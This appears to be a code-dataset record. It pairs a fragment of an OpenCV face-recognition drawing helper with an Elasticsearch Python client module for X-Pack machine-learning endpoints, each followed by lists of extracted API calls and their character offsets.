cv2.rectangle(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)
# Below function writes name of person for detected label
def put_text(test_img, text, x, y):
cv2.putText(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)
| [
"cv2.rectangle",
"os.path.join",
"cv2.face.LBPHFaceRecognizer_create",
"cv2.putText",
"numpy.array",
"os.path.basename",
"cv2.cvtColor",
"cv2.CascadeClassifier",
"cv2.imread",
"os.walk"
]
| [((261, 303), 'cv2.cvtColor', 'cv2.cvtColor', (['test_img', 'cv2.COLOR_BGR2GRAY'], {}), '(test_img, cv2.COLOR_BGR2GRAY)\n', (273, 303), False, 'import cv2\n'), ((364, 436), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""HaarCascade/haarcascade_frontalface_default.xml"""'], {}), "('HaarCascade/haarcascade_frontalface_default.xml')\n", (385, 436), False, 'import cv2\n'), ((878, 896), 'os.walk', 'os.walk', (['directory'], {}), '(directory)\n', (885, 896), False, 'import os\n'), ((2203, 2239), 'cv2.face.LBPHFaceRecognizer_create', 'cv2.face.LBPHFaceRecognizer_create', ([], {}), '()\n', (2237, 2239), False, 'import cv2\n'), ((2447, 2520), 'cv2.rectangle', 'cv2.rectangle', (['test_img', '(x, y)', '(x + w, y + h)', '(255, 0, 0)'], {'thickness': '(5)'}), '(test_img, (x, y), (x + w, y + h), (255, 0, 0), thickness=5)\n', (2460, 2520), False, 'import cv2\n'), ((2621, 2700), 'cv2.putText', 'cv2.putText', (['test_img', 'text', '(x, y)', 'cv2.FONT_HERSHEY_DUPLEX', '(2)', '(255, 0, 0)', '(4)'], {}), '(test_img, text, (x, y), cv2.FONT_HERSHEY_DUPLEX, 2, (255, 0, 0), 4)\n', (2632, 2700), False, 'import cv2\n'), ((2273, 2289), 'numpy.array', 'np.array', (['faceID'], {}), '(faceID)\n', (2281, 2289), True, 'import numpy as np\n'), ((1098, 1120), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1114, 1120), False, 'import os\n'), ((1175, 1203), 'os.path.join', 'os.path.join', (['path', 'filename'], {}), '(path, filename)\n', (1187, 1203), False, 'import os\n'), ((1320, 1340), 'cv2.imread', 'cv2.imread', (['img_path'], {}), '(img_path)\n', (1330, 1340), False, 'import cv2\n')] |
from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Default to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: None
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score:
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Default
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: None
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in decending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
| [
"elasticsearch.client.utils.query_params",
"elasticsearch.client.utils._make_path"
]
| [((136, 165), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (148, 165), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((543, 557), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (555, 557), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((940, 954), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (952, 954), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1364, 1475), 'elasticsearch.client.utils.query_params', 'query_params', (['"""anomaly_score"""', '"""desc"""', '"""end"""', '"""exclude_interim"""', '"""expand"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',\n 'from_', 'size', 'sort', 'start')\n", (1376, 1475), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2661, 2701), 'elasticsearch.client.utils.query_params', 'query_params', (['"""reset_end"""', '"""reset_start"""'], {}), "('reset_end', 'reset_start')\n", (2673, 2701), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3533, 3565), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (3545, 3565), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4265, 4279), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4277, 4279), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4640, 4654), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4652, 4654), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4851, 4865), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4863, 4865), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5419, 5433), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (5431, 5433), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5820, 5859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""end"""', '"""start"""', '"""timeout"""'], {}), "('end', 'start', 'timeout')\n", (5832, 5859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6759, 6859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""record_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'record_score',\n 'size', 'sort', 'start')\n", (6771, 6859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7802, 7816), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (7814, 7816), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8404, 8418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8416, 8418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8898, 8912), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8910, 8912), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9532, 9546), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (9544, 9546), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((10074, 10147), 'elasticsearch.client.utils.query_params', 'query_params', (['"""advance_time"""', '"""calc_interim"""', '"""end"""', '"""skip_time"""', '"""start"""'], {}), "('advance_time', 'calc_interim', 'end', 'skip_time', 'start')\n", (10086, 10147), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11398, 11430), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (11410, 11430), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12091, 12105), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (12103, 12105), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12590, 12611), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (12602, 12611), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13160, 13174), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13172, 13174), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13922, 13936), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13934, 13936), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14335, 14349), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (14347, 14349), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14708, 14737), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (14720, 14737), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15567, 15671), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""influencer_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',\n 'size', 'sort', 'start')\n", (15579, 15671), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16782, 16796), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (16794, 16796), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17389, 17410), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (17401, 17410), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17996, 18010), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (18008, 18010), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18398, 18440), 'elasticsearch.client.utils.query_params', 'query_params', (['"""delete_intervening_results"""'], {}), "('delete_intervening_results')\n", (18410, 18440), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19283, 19344), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'from_', 'size', 'sort', 'start')\n", (19295, 19344), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20404, 20418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (20416, 20418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((460, 508), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (470, 508), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((853, 905), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (863, 905), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1267, 1329), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stats')\n", (1277, 1329), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2515, 2607), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""buckets"""', 'timestamp'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'buckets', timestamp)\n", (2525, 2607), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3394, 3458), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_data"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_data')\n", (3404, 3458), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4169, 4230), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stop"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stop')\n", (4179, 4230), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4550, 4605), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (4560, 4605), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5318, 5373), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (5328, 5373), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6651, 6713), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_start"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_start')\n", (6661, 6713), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7667, 7744), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""records"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results', 'records')\n", (7677, 7744), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8292, 8358), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_update')\n", (8302, 8358), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8804, 8852), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (8814, 8852), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9423, 9486), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_update"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_update')\n", (9433, 9486), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9975, 10039), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_preview"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_preview')\n", (9985, 10039), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11287, 11352), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_flush"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_flush')\n", (11297, 11352), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11991, 12056), 'elasticsearch.client.utils._make_path', '_make_path', 